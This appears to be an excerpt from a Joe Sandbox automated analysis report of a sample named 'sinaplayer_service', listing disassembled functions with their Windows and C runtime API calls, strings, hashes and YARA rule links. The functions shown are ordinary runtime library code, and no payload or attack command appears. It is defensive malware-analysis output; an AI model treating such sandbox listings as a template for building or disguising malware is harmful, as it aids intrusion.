                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrowVersion@$AddressAllocConcurrency@@HandleHeapManager@1@ModuleProcResourcemallocstd::exception::exception
                                                                                                                                                                                                    • String ID: GetLogicalProcessorInformationEx$]lm$kernel32.dll$%m
                                                                                                                                                                                                    • API String ID: 615551232-1272108725
                                                                                                                                                                                                    • Opcode ID: 5fcf6041030112f2ef998bdd32fb327f1a4fec9168d8b5c2dd48db7cb39d619d
                                                                                                                                                                                                    • Instruction ID: 1bb34aa54777aee98295acdf256765b32fa25be66e03007c5bfa449fa7970e1d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fcf6041030112f2ef998bdd32fb327f1a4fec9168d8b5c2dd48db7cb39d619d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E431D37560421AABFB20EAF59C84FBFBBACAF45250B100527FA00E7147DB71C900C6B1
                                                                                                                                                                                                    Function 6D097C5E Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getdrive.MSVCR120 ref: 6D097C6F
                                                                                                                                                                                                      • Part of subcall function 6D094728: GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(0000002E,00000000,?,0000002E), ref: 6D097CB6
                                                                                                                                                                                                    • __validdrive.LIBCMT ref: 6D0D46AD
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D46BB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D46C6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D46D1
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D46DD
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D46E8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$CurrentDirectoryFullNamePath__doserrno__validdrive_getdrive
                                                                                                                                                                                                    • String ID: .$:.
                                                                                                                                                                                                    • API String ID: 1520938557-2811378331
                                                                                                                                                                                                    • Opcode ID: 8afd7c5653076daa219a3382f0581b73cc7cfbd6529f0d29c4f272820b9c81de
                                                                                                                                                                                                    • Instruction ID: 6fa2d9e14ba2316d57ce107662612d00d3a60f450dc8cec8dc3e39d5be79573e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8afd7c5653076daa219a3382f0581b73cc7cfbd6529f0d29c4f272820b9c81de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231DBB6618346BBF7019FA4C84076E77ECAF4A354F12546AEB14DF240EB70D9409772
                                                                                                                                                                                                    Function 6D1425B1 Relevance: 28.8, APIs: 19, Instructions: 299COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _dtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2231236516-0
                                                                                                                                                                                                    • Opcode ID: 324a800fd7fc76350dcfd6e6dc60f714798dbe5f3e782f0ff446aebe9c5d8371
                                                                                                                                                                                                    • Instruction ID: e592b2400c43672eacb75182921f85fd4f2fb4e169e0bb39d90718b5ca5bc6e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 324a800fd7fc76350dcfd6e6dc60f714798dbe5f3e782f0ff446aebe9c5d8371
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0281C371C0481AD2CF12AF94E8451EFBFB5FF46364F528480ED84BA188EFF245A58785
                                                                                                                                                                                                    Function 6D1428B5 Relevance: 28.7, APIs: 19, Instructions: 244COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6D1428C2
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?,?,?), ref: 6D1428D0
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?), ref: 6D1428DC
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D1428E8
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6D142B3B
                                                                                                                                                                                                    • __FCbuild.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6D142B56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fdtest$Cbuild_cimagf_crealf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 791420253-0
                                                                                                                                                                                                    • Opcode ID: e50e70d10f62d2911f6ae43bcd8444ab39f3dec062d94944da299199b7d1ef9d
                                                                                                                                                                                                    • Instruction ID: 615d83ffec595730921baa097c009e467a8c49b4ae0602b7265b182f31e16114
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e50e70d10f62d2911f6ae43bcd8444ab39f3dec062d94944da299199b7d1ef9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 148159B1D0901AEFCF156B90DA486EEBF74FF41714FA2C484D590B2098DBB04AB19F59
                                                                                                                                                                                                    Function 6D0B0C66 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(6D0B0A2E,6D0B0A2E,00000010,00000000,6D0B028F,00000000), ref: 6D0DD17F
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DD248
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::atol
                                                                                                                                                                                                    • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                                                                                                                    • API String ID: 2130343216-3945972591
                                                                                                                                                                                                    • Opcode ID: 3fd630ee924d77a164ee8859031ded7edb4a6431da404497c3267d7e5d025ab5
                                                                                                                                                                                                    • Instruction ID: f6329dd5c21539671e1e3a3b18ef8b1638e5ab63ea7423d35a7842eb3d9846c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd630ee924d77a164ee8859031ded7edb4a6431da404497c3267d7e5d025ab5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C571A17195C309AEFB60CBB8CD94FFE77B8AF46304F51406AE20593181DF749A448B61
                                                                                                                                                                                                    Function 6D0A3E9D Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 115threadregistryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0A3EB4
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000A4,00000000,00000000,00000002,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3ED8
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0A3EDB
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EE2
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EE5
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EF3
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ___crtSetThreadpoolWait.LIBCMT ref: 6D0A3F37
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1E48
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,6D0ECB49,00000000,000000FF,0000000C), ref: 6D0D1E97
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EA1
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EB8
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: GetModuleHandleA.KERNEL32(00000000,7622F550), ref: 6D0A3A99
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: GetModuleFileNameW.KERNEL32(6D080000,?,00000104), ref: 6D0A3AB6
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D0A3ACF
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EE4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,?,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EF3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorHandleLastModuleProcessThreadVersion@Wait$Concurrency@@DuplicateExceptionFileH_prolog3LibraryLoadManager@1@NameObjectRegisterResourceSingleThreadpoolThrow___crt
                                                                                                                                                                                                    • String ID: -1m
                                                                                                                                                                                                    • API String ID: 228956268-3491251440
                                                                                                                                                                                                    • Opcode ID: bdd6f8b16db48eff5fbb44a44055f756055d4d8f39b11b1c0785dbe5c553a2fe
                                                                                                                                                                                                    • Instruction ID: fad00173dae2fbc636f07e37f13938caf68b1064b028ba1d6495062e9c8234e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd6f8b16db48eff5fbb44a44055f756055d4d8f39b11b1c0785dbe5c553a2fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E331E371608352AFF700EBB59C48F7BBBECBB46654F04052AB698C6142DB74D804CBB2
                                                                                                                                                                                                    Function 6D0A6D17 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,?,00000180,00000000,6D0A6E91,00000004,6D0A6A4C,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?), ref: 6D0A6D29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6D0A6D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6D0A6D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6D0A6D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6D0A6D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6D0A6D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6D0A6DA3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D0948CA), ref: 6D0D379E
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,6D0948CA), ref: 6D0D37AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2340687224-19120757
                                                                                                                                                                                                    • Opcode ID: 5a733482c004f6cc1c9403c2e8810dbbc8d367b497cca28d794ca968987060d9
                                                                                                                                                                                                    • Instruction ID: 6f68cd230049f5c04b04663c4886138a1be7f5a5084eb00bdde26233dfd02e69
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a733482c004f6cc1c9403c2e8810dbbc8d367b497cca28d794ca968987060d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3115431A10590AFEB189FA9D995B3A7BB8FB86601748442FE40687386DBB1D800CBD0
                                                                                                                                                                                                    Function 6D0A3C0B Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$Concurrency@@CreateEventManager@1@Resource__crt
                                                                                                                                                                                                    • String ID: ]lm
                                                                                                                                                                                                    • API String ID: 2006412488-2416103240
                                                                                                                                                                                                    • Opcode ID: a5e5227d00c961478151d052d369dd38c57b886cdcdee0872991afb7b6ca2efc
                                                                                                                                                                                                    • Instruction ID: d56b45f9c51bf66995c4e864980eb8f6e307eee67dd3d835507d8cf404a04a4e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5e5227d00c961478151d052d369dd38c57b886cdcdee0872991afb7b6ca2efc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C221C87560825AAFF710EAF69C48FBFBBACBF00244B540517BA15E704BEB25C400C6B4
                                                                                                                                                                                                    Function 6D0EF893 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EFAC6
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000030), ref: 6D0EFAEA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?,?,?,?,?,?), ref: 6D0EFAFF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0EFB12
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0EFB23
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,00000000), ref: 6D0EFB62
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0EFB89
                                                                                                                                                                                                    • SetProcessAffinityMask.KERNEL32(00000000), ref: 6D0EFB90
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D0EFBA3
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000), ref: 6D0EFBA9
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0EFBB2
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D0EFBDB
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000), ref: 6D0EFBE1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$??2@CurrentProcess$??0exception@std@@AffinityExceptionH_prolog3_MaskThreadThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: dwAffinityMask
                                                                                                                                                                                                    • API String ID: 2988529099-4260635329
                                                                                                                                                                                                    • Opcode ID: 118ffd41037aab82f3bef2e9650320fefbf3012790d128c15770d52b5e50e449
                                                                                                                                                                                                    • Instruction ID: 288e44cfa20b542f7a0da598616ef850868cc8bd06d12ba2c061dc13d0cac1af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118ffd41037aab82f3bef2e9650320fefbf3012790d128c15770d52b5e50e449
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA3100729186059FFF048FA4E9157BEBBB8BF45384F11842AE611A7281DFB09440CB95
                                                                                                                                                                                                    Function 6D0B3FF7 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B3FFF
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4018
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B402B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4049
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B405B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B406C
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4077
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0B409B
                                                                                                                                                                                                    • EncodePointer.KERNEL32(005C2A20), ref: 6D0B40A2
                                                                                                                                                                                                    • free.MSVCR120(005C74F0), ref: 6D0B40E3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
